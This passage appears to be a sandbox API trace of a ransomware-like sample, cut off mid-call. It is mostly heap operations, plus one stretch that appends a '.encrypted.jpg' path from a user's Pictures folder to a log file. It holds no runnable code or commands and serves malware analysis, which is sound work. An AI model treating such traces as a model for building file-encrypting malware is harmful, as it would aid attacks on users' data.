[0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1c0) returned 0x7c95d0 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0040.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.143] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.143] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.143] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.143] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.143] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.144] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.144] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2c7d, lpOverlapped=0x0) returned 1 [0040.145] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.145] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2c7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.145] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.encrypted.jpg\r\n", cchWideChar=115, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 115 [0040.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x73) returned 0x7800d0 [0040.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.encrypted.jpg\r\n", cchWideChar=115, lpMultiByteStr=0x7800d0, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 115 [0040.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0040.146] WriteFile (in: hFile=0x128, lpBuffer=0x7d5bb8*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5bb8*, lpNumberOfBytesWritten=0x6aee3c*=0x72, lpOverlapped=0x0) returned 1 [0040.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.146] CloseHandle (hObject=0x128) returned 1 [0040.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.148] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.148] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.149] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.149] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.149] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.149] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.150] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.153] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.153] RtlAllocateHeap 